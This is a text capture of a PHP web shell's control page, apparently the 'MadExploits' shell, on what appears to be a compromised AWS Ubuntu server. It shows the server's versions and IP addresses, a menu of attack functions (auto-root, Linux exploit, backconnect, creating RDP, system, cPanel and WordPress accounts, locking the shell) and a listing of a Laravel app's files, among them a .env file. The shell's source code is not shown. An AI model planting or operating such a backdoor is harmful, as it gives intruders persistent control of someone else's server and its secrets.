Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dashboard.maalgaadi /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
.well-known
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
resources
[ DIR ]
drwxrwxr-x
ssl
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.env
210
B
-rwxrwxr-x
.gitignore
183
B
-rwxrwxr-x
New Text Document.txt
893
B
-rwxrwxr-x
artisan
1.61
KB
-rwxrwxr-x
composer.json
1.69
KB
-rwxrwxr-x
composer.lock
255.07
KB
-rw-rw-r--
composer.phar
2.27
MB
-rwxrwxr-x
git
107
B
-rwxrwxr-x
git.save
108
B
-rwxrwxr-x
gulpfile.js
503
B
-rwxrwxr-x
gunjan.txt
14
B
-rwxrwxr-x
oot
0
B
-rwxrwxr-x
package.json
159
B
-rwxrwxr-x
phpspec.yml
87
B
-rwxrwxr-x
phpunit.xml
1
KB
-rwxrwxr-x
readme.md
1.88
KB
-rwxrwxr-x
server.php
567
B
-rwxrwxr-x
test.php
260
B
-rwxrwxr-x
text.txt
23
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/bootstrap/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running. We will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close